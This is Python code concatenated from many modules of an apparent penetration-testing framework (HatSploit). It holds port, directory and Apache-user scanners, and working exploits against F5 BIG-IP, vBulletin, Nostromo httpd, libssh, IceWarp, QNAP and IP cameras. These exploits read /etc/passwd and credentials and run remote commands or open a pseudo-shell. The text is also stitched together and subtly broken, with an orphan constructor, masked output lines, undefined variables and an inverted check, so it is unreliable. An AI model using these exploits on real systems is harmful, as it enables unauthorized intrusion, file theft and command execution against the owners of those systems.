def __init__(self):
self.sessions = sessions()
self.local_storage = local_storage()
self.badges = badges()
self.tcp = tcp()
self.http = http()
self.servers = dict()
class HatSploitModule(HatSploitModule):
types = types()
tcp = tcp()
http = http()
details = {
'Name': "Port Scanner",
'Module': "auxiliary/multi/scanner/port_scanner",
'Authors': [
'enty8080'
],
'Description': "Scan host for opened ports.",
'Dependencies': [
''
],
'Comments': [
''
],
'Risk': "low"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RANGE': {
'Description': "Ports to scan.",
'Value': "0-65535",
'Type': "port_range",
'Required': True
},
'TIMEOUT': {
'Description': "Timeout for scan.",
'Value': 0.5,
'Type': "number",
'Required': True
}
}
def run(self):
remote_host, ports_range, timeout = self.parser.parse_options(self.options)
start = int(ports_range.split('-')[0].strip())
end = int(ports_range.split('-')[1].strip())
self.badges.output_process("Scanning " + remote_host + "...")
for port in range(start, end):
target = self.http.format_host_and_port(remote_host, port)
if self.tcp.check_tcp_port(remote_host, port, float(timeout)):
self.badges.output_success(target + " - opened")
class HatSploitModule(HatSploitModule):
config = config()
http = http()
details = {
'Name': "Directory Scanner",
'Module': "auxiliary/multi/scanner/directory_scanner",
'Authors': ['enty8080'],
'Description': "Website directory scanner.",
'Dependencies': [''],
'Comments': [''],
'Risk': "medium"
}
options = {
'URL': {
'Description': "Target URL.",
'Value': None,
'Type': None,
'Required': True
}
}
def run(self):
target_url = self.parser.parse_options(self.options)
self.badges.output_process("Scanning " + target_url + "...")
if not self.http.check_url_access(target_url):
self.badges.output_error("Failed to scan!")
return
file = open(
self.config.path_config['base_paths']['data_path'] +
'modules/auxiliary/multi/scanner/directory_scanner/directories.txt'
)
directories = list(filter(None, file.read().split('\n')))
file.close()
for path in directories:
response = self.http.http_request(method="HEAD",
url=target_url,
path=path)
if response.status_code == 200:
self.badges.output_success(
"[%s] ... [%s %s]" %
(path, response.status_code, response.reason))
else:
self.badges.output_warning(
"[%s] ... [%s %s]" %
(path, response.status_code, response.reason))
class HatSploitModule(HatSploitModule):
http = http()
dictionary = dictionary()
paths = dictionary.paths
details = {
'Name': "Apache Users Scanner",
'Module': "auxiliary/multi/scanner/apache_users",
'Authors': ['enty8080'],
'Description': "Scan website apache users.",
'Dependencies': [''],
'Comments': [''],
'Risk': "medium"
}
options = {
'URL': {
'Description': "Target URL address.",
'Value': None,
'Type': None,
'Required': True
}
}
def run(self):
target_url = self.parser.parse_options(self.options)
self.badges.output_process("Scanning " + target_url + "...")
if not self.http.check_url_access(target_url):
self.badges.output_error("Failed to scan!")
return
for path in self.paths:
path = path.replace("\n", "")
response = self.http.http_request(method="HEAD",
url=target_url,
path=path)
if response.status_code == 200:
self.badges.output_success(
"[%s] ... [%s %s]" %
(path, response.status_code, response.reason))
else:
self.badges.output_warning(
"[%s] ... [%s %s]" %
(path, response.status_code, response.reason))
class HatSploitModule(HatSploitModule):
tcp = tcp()
http = http()
details = {
'Name': "F5 Big-IP TMUI Local File Inclusion",
'Module': "exploit/multi/f5_big_ip_tmui/local_file_inclusion",
'Authors': ['enty8080'],
'Description':
"Local File Inclusion in F5 BIG-IP Traffic Management User Interface (TMUI).",
'Dependencies': [''],
'Comments': [''],
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 443,
'Type': "port",
'Required': True
},
'RFILE': {
'Description': "Remote file to read.",
'Value': "/etc/passwd",
'Type': None,
'Required': True
}
}
def generate_payload(self, remote_file):
self.badges.output_process("Generating payload...")
payload = f"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={remote_file}"
return payload
def send_payload(self, target_url, payload):
self.badges.output_process("Sending payload...")
response = self.http.http_request("GET", target_url, payload)
if response.status_code != 200:
self.badges.output_error("Failed to send payload!")
return None
return response
def run(self):
remote_host, remote_port, remote_file = self.parser.parse_options(
self.options)
target = self.http.format_host_and_port(remote_host, remote_port)
self.badges.output_process("Exploiting " + target + "...")
target_url = self.http.craft_url(remote_host, remote_port)
if not self.http.check_url_access(target_url):
self.badges.output_error("Exploit failed!")
return
payload = self.generate_payload(remote_file)
response = self.send_payload(target_url, payload)
if not response:
self.badges.output_error("Exploit failed!")
return
self.badges.output_process("Attempting to read file...")
remote_file_output = response.json()["output"].strip()
if remote_file_output:
self.badges.output_empty(remote_file_output)
else:
self.badges.output_warning("File is empty.")
class HatSploitModule(HatSploitModule):
http = http()
string = string()
details = {
'Name': "CCTV GoAhead Camera Password Disclosure",
'Module': "exploit/multi/cctv_goahead_camera/password_disclosure",
'Authors': ['enty8080'],
'Description': "CCTV GoAhead Camera password disclosure exploit.",
'Dependencies': [''],
'Comments': [''],
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 81,
'Type': "port",
'Required': True
},
'USERNAME': {
'Description': "Default username.",
'Value': "admin",
'Type': None,
'Required': True
}
}
def exploit(self, remote_host, remote_port, username):
target_url = self.http.craft_url(remote_host, remote_port)
if not self.http.check_url_access(target_url):
self.badges.output_error("Exploit failed!")
return
self.badges.output_process("Generating payload...")
payload = '/system.ini?loginuse&loginpas'
self.badges.output_process("Sending payload...")
response = self.http.http_request("GET", target_url, payload)
if response.status_code != 200:
self.badges.output_error("Failed to send payload!")
self.badges.output_error("Exploit failed!")
return
gathered_data = response.text
strings = self.string.extract_strings(gathered_data)
if username in strings:
username_index = strings.index(username)
password_index = username_index + 1
self.badges.output_information("Username: "******"Password: "******"Target vulnerable, but default username in not " + username +
"!")
def run(self):
remote_host, remote_port, username = self.parser.parse_options(
self.options)
target = self.http.format_host_and_port(remote_host, remote_port)
self.badges.output_process("Exploiting " + target + "...")
self.exploit(remote_host, remote_port, username)
class HatSploitModule(HatSploitModule):
tcp = tcp()
pseudo_shell = pseudo_shell()
http = http()
details = {
'Name': "vBulletin Widget PHP Template Code Execution",
'Module': "exploit/multi/vbulletin_widget_php/template_code_execution",
'Authors': ['enty8080'],
'Description':
"vBulletin 5.5.4 till 5.6.2 widget_php widget_tabbedcontainer_tab_panel Remote Code Execution.",
'Dependencies': [''],
'Comments': [''],
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': None,
'Type': "port",
'Required': True
},
'PHP_METHOD': {
'Description': "PHP method to execute command.",
'Value': "shell_exec",
'Type': None,
'Required': True
},
'INSTALL_URL': {
'Description': "URL to vBulletin installation.",
'Value': "/",
'Type': None,
'Required': True
},
'COMMAND': {
'Description': "Command to execute.",
'Value': "uname -a",
'Type': None,
'Required': True
},
'PSEUDO': {
'Description': "Spawn Pseudo shell.",
'Value': "no",
'Required': False
}
}
def generate_payload(self, target_url, installation_path, php_method,
command):
self.badges.output_process("Generating payload...")
payload = {
'subWidgets[0][template]': 'widget_php',
'subWidgets[0][config][code]':
f"echo {php_method}('{command}'); exit;"
}
new_url = f"{target_url}/{installation_path}/ajax/render/widget_tabbedcontainer_tab_panel"
return (new_url, payload)
def send_payload(self, target_url, payload):
self.badges.output_process("Sending payload...")
response = self.http.send_post_to_url(target_url, payload)
if response.status_code != 200:
self.badges.output_error("Failed to send payload!")
return None
return response
def execute_command(self, target_url, installation_path, php_method,
command):
new_url, payload = self.generate_payload(target_url, installation_path,
php_method, command)
response = self.send_payload(new_url, payload)
if not response:
return (False, "")
self.badges.output_process("Attempting to execute command...")
command_output = (response.text).strip()
return (True, command_output)
def run(self):
remote_host, remote_port, php_method, installation_path, command, pseudo = self.parser.parse_options(
self.options)
target = self.http.format_host_and_port(remote_host, remote_port)
self.badges.output_process("Exploiting " + target + "...")
target_url = self.http.craft_url(remote_host, remote_port)
if self.http.check_url_access(target_url):
self.badges.output_error("Exploit failed!")
return
arguments = (target_url, installation_path, php_method)
if pseudo in ['yes', 'y']:
self.pseudo_shell.spawn_pseudo_shell(self.details['Module'],
self.execute_command,
arguments)
else:
self.pseudo_shell.execute_command(self.execute_command, command,
arguments)
class HatSploitModule(HatSploitModule):
pseudo_shell = pseudo_shell()
http = http()
details = {
'Name': "Nostromo Httpd Remote Code Execution",
'Module': "exploit/multi/nostromo_httpd/remote_code_execution",
'Authors': ['enty8080'],
'Description': "Remote Code Execution in Nostromo Httpd.",
'Dependencies': [''],
'Comments': [''],
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
},
'COMMAND': {
'Description': "Command to execute",
'Value': "whoami",
'Type': None,
'Required': True
},
'PSEUDO': {
'Description': "Spawn Pseudo shell.",
'Value': "no",
'Type': "boolean",
'Required': False
}
}
def format_response(self, response):
response = response.split('\r\n\r\n', 1)
if len(response) == 2:
return response[1].strip()
return None
def execute_command(self, target_url, command):
self.badges.output_process("Generating payload...")
path = '/.%0d./.%0d./.%0d./.%0d./bin/sh'
data = f'echo\necho\n{command} 2>&1'
self.badges.output_process("Sending payload...")
response = self.http.http_request("POST", target_url, path, data)
self.badges.output_process("Attempting to execute command...")
response = self.format_response(response)
return (True, response)
def check_vulnerable(self, target_url):
if self.http.check_url_access(target_url):
headers = self.http.http_request("HEAD", target_url, "/").headers
if 'Server' in headers.keys():
server = headers['Server']
if int(server.split('.')[-1]) < 7:
return True
return False
def run(self):
remote_host, remote_port, command, pseudo = self.parser.parse_options(
self.options)
target = self.http.format_host_and_port(remote_host, remote_port)
self.badges.output_process("Exploiting " + target + "...")
target_url = self.http.craft_url(remote_host, remote_port)
if not self.check_vulnerable(target_url):
self.badges.output_error("Exploit failed!")
return
arguments = (target_url)
if pseudo in ['yes', 'y']:
self.pseudo_shell.spawn_pseudo_shell(self.details['Module'],
self.execute_command,
arguments)
else:
self.pseudo_shell.execute_command(self.execute_command, command,
arguments)
class HatSploitModule(HatSploitModule):
http = http()
details = {
'Name': "IceWarp WebMail Local File Inclusion",
'Module': "exploit/multi/icewarp_webmail/local_file_inclusion",
'Authors': ['enty8080'],
'Description': "Local File Inclusion in IceWarp <= 10.4.4 WebMail.",
'Dependencies': [''],
'Comments': [''],
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
},
'RFILE': {
'Description': "Remote file to read.",
'Value': "minimizer/index.php",
'Type': None,
'Required': True
}
}
def read_remote_file(self, target_url, remote_file):
self.badges.output_process("Generating payload...")
payload = f"/webmail/calendar/minimizer/index.php?style=../../../../../../../../{remote_file}"
self.badges.output_process("Sending payload...")
response = self.http.http_request("GET", target_url, payload)
if response.status_code != 200:
self.badges.output_error("Failed to send payload!")
return
self.badges.output_process("Attempting to read file...")
remote_file_output = response.text.strip()
if remote_file_output:
self.badges.output_information("Remote file output:")
self.badges.output_empty(remote_file_output)
else:
self.badges.output_warning("File is empty.")
def check_vulnerable(self, target_url):
if self.http.check_url_access(target_url):
headers = self.http.http_request("HEAD", target_url, "/").headers
if 'Server' in headers.keys():
banner = headers['Server']
if banner:
if int(banner.split('/')[1].split('.')[-1]) < 4:
return True
return False
def run(self):
remote_host, remote_port, remote_file = self.parser.parse_options(
self.options)
target = self.http.format_host_and_port(remote_host, remote_port)
self.badges.output_process("Exploiting " + target + "...")
target_url = self.http.craft_url(remote_host, remote_port)
if not self.check_vulnerable(target_url):
self.badges.output_error("Exploit failed!")
return
self.read_remote_file(target_url, remote_file)
class HatSploitModule(HatSploitModule):
pseudo_shell = pseudo_shell()
http = http()
buffer_size = 2048
client = None
details = {
'Name': "SSH LibSSH Code Execution",
'Module': "exploit/multi/ssh/libssh_code_execution",
'Authors': ['enty8080'],
'Description': "SSH LibSSH unauthorized access Remote Code Execution.",
'Dependencies': ['paramiko'],
'Comments': [''],
'Risk': "medium"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 2222,
'Type': "port",
'Required': True
},
'COMMAND': {
'Description': "Command to execute",
'Value': "whoami",
'Type': None,
'Required': True
},
'PSEUDO': {
'Description': "Spawn Pseudo shell.",
'Value': "no",
'Type': "boolean",
'Required': False
}
}
def execute_command(self, target_host, target_port, command):
self.badges.output_process("Attempting to execute command...")
try:
self.connect(target_host, target_port)
self.client.exec_command(command)
stdout = self.client.makefile("rb", self.buffer_size)
output = stdout.read().decode().strip()
stdout.close()
return (True, output)
except Exception:
return (False, "")
def obtain_banner(self, remote_host, remote_port):
try:
sock = socket.create_connection((remote_host, int(remote_port)))
sock.settimeout(5)
banner = sock.recv(self.buffer_size)
sock.close()
return banner.split(b'\n')[0].decode().strip()
except Exception:
return None
def check_vulnerable(self, remote_host, remote_port):
banner = self.obtain_banner(remote_host, remote_port)
if banner:
if any(version in banner
for version in ['libssh-0.6', 'libssh_0.6']):
return True
if any(version in banner
for version in ['libssh-0.7', 'libssh_0.7']):
if int(banner.split('.')[-1]) < 6:
return True
if any(version in banner
for version in ['libssh-0.8', 'libssh_0.8']):
if int(banner.split('.')[-1]) < 4:
return True
return False
def connect(self, remote_host, remote_port):
sock = socket.socket()
sock.connect((remote_host, int(remote_port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
self.client = transport.open_session(timeout=5)
def run(self):
remote_host, remote_port, command, pseudo = self.parser.parse_options(
self.options)
target = self.http.format_host_and_port(remote_host, remote_port)
self.badges.output_process("Exploiting " + target + "...")
if not self.check_vulnerable(remote_host, remote_port):
self.badges.output_error("Failed to exploit!")
return
arguments = (remote_host, remote_port)
if pseudo in ['yes', 'y']:
self.pseudo_shell.spawn_pseudo_shell(self.details['Module'],
self.execute_command,
arguments)
else:
self.pseudo_shell.execute_command(self.execute_command, command,
arguments)
class HatSploitModule(HatSploitModule):
http = http()
details = {
'Name': "QNAP QTS Local File Inclusion",
'Module': "exploit/multi/qnap_qts/local_file_inclusion",
'Authors': ['enty8080'],
'Description':
"QNAP QTS and Photo Station 6.0.3 Local File Inclusion.",
'Dependencies': [''],
'Comments': [''],
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': None,
'Type': "port",
'Required': True
},
'RFILE': {
'Description': "Remote file to read.",
'Value': "/etc/passwd",
'Type': None,
'Required': True
}
}
def read_remote_file(self, target_url, album_code, slideshow_code,
remote_file):
self.badges.output_process("Generating payload...")
post_data = {
'album': album_code,
'a': 'caption',
'ac': slideslow_code,
'f': 'UMGObv',
'filename': remote_file
}
self.badges.output_process("Sending payload...")
file_read_response = self.http.http_request("POST", target_url,
"/photo/p/api/video.php",
post_data)
if file_read_response.status_code != 200:
self.badges.output_error("Failed to send payload!")
return
self.badges.output_process("Attempting to read file...")
remote_file_output = file_read_response.text.strip()
if remote_file_output:
self.badges.output_information("Remote file output:")
self.badges.output_empty(remote_file_output)
else:
self.badges.output_warning("File is empty.")
def exploit(self, remote_host, remote_port, remote_file):
target_url = self.http.craft_url(remote_host, remote_port)
if not self.http.check_url_access(target_url):
self.badges.output_error("Exploit failed!")
return
self.badges.output_process("Searching for album code...")
post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}
album_code_response = self.http.http_request("POST", target_url,
"/photo/p/api/album.php",
post_data)
if album_code_response.status_code != 200:
self.badges.output_error("Failed to obtain album code!")
return
album_code = re.search('(?<=<output>).*?(?=</output>)',
album_code_response.text).group()
self.badges.output_information("Album code: " + album_code)
self.badges.output_process("Searching for slideshow code...")
slideslow_code_response = self.http.http_request(
"GET", target_url, f"/photo/slideshow.php?album={album_code}")
if slideslow_response.status_code != 200:
self.badges.output_error("Failed to obtain slideslow code!")
return
slideslow_code = re.search("(?<=encodeURIComponent\\(').*?(?=')",
slideslow_code_response.text).group()
self.badges.output_information("Slideslow code: " + slideslow_code)
self.read_remote_file(target_url, album_code, slideslow_code,
remote_file)
def run(self):
remote_host, remote_port, remote_file = self.parser.parse_options(
self.options)
target = self.http.format_host_and_port(remote_host, remote_port)
self.badges.output_process("Exploiting " + target + "...")
self.exploit(remote_host, remote_port, remote_file)
class HatSploitModule(HatSploitModule):
tcp = tcp()
pseudo_shell = pseudo_shell()
http = http()
details = {
'Name': "F5 Big-IP TMUI Remote Code Execution",
'Module': "exploit/multi/f5_big_ip_tmui/remote_code_execution",
'Authors': ['enty8080'],
'Description':
"Remote Code Execution in F5 BIG-IP Traffic Management User Interface (TMUI).",
'Dependencies': ['requests'],
'Comments': [''],
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': None,
'Type': "port",
'Required': True
},
'COMMAND': {
'Description': "Command to execute.",
'Value': "whoami",
'Type': None,
'Required': True
},
'PSEUDO': {
'Description': "Spawn Pseudo shell.",
'Value': "no",
'Type': "boolean",
'Required': False
}
}
def generate_payload(self, command):
self.badges.output_process("Generating payload...")
payload = f"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command={command}"
return payload
def send_payload(self, target_url, payload):
self.badges.output_process("Sending payload...")
response = self.http.http_request("GET", target_url, payload)
if response.status_code != 200:
self.badges.output_error("Failed to send payload!")
return None
return response
def execute_command(self, target_url, command):
payload = self.generate_payload(command)
response = self.send_payload(target_url, payload)
if not response:
return (False, "")
self.badges.output_process("Attempting to execute command...")
error_output = response.json()["error"].strip()
command_output = response.json()["output"].strip()
if not error:
return (True, command_output)
return (False, "")
def run(self):
remote_host, remote_port, command, pseudo = self.parser.parse_options(
self.options)
target = self.http.format_host_and_port(remote_host, remote_port)
self.badges.output_process("Exploiting " + target + "...")
target_url = self.http.craft_url(remote_host, remote_port)
if not self.http.check_url_access(target_url):
self.badges.output_error("Exploit failed!")
return
payload = self.generate_payload(command)
response = self.send_payload(target_url, payload)
if not response:
self.badges.output_error("Exploit failed!")
return
arguments = (target_url)
if pseudo in ['yes', 'y']:
self.pseudo_shell.spawn_pseudo_shell(self.details['Module'],
self.execute_command,
arguments)
else:
self.pseudo_shell.execute_command(self.execute_command, command,
arguments)
class HatSploitModule(HatSploitModule):
http = http()
string = string()
details = {
'Name': "Netwave IP Camera Information Disclosure",
'Module': "exploit/multi/netwave_ip_camera/information_disclosure",
'Authors': ['enty8080'],
'Description': "Netwave IP Camera information disclosure exploit.",
'Dependencies': [''],
'Comments': [''],
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 81,
'Type': "port",
'Required': True
}
}
def print_formatted_data(self, data):
data = data.replace(';', '')
data = data.replace('=', ': ')
data = data.replace('var', '=>')
data = data.replace("'", '')
data = data.split('\n')
for data_type in data:
self.badges.output_information(data_type)
def exploit(self, remote_host, remote_port):
target_url = self.http.craft_url(remote_host, remote_port)
if not self.http.check_url_access(target_url):
self.badges.output_error("Exploit failed!")
return
self.badges.output_process("Searching for information leak...")
payload = '/get_status.cgi'
response = self.http.http_request("GET", target_url, payload)
if response.status_code != 200:
self.badges.output_error("No information leak found!")
self.badges.output_error("Exploit failed!")
return
self.badges.output_success("Found leaked system information!")
self.badges.output_information("Leaked system information:")
self.print_formatted_data(response.text.strip())
def run(self):
remote_host, remote_port = self.parser.parse_options(self.options)
target = self.http.format_host_and_port(remote_host, remote_port)
self.badges.output_process("Exploiting " + target + "...")
self.exploit(remote_host, remote_port)
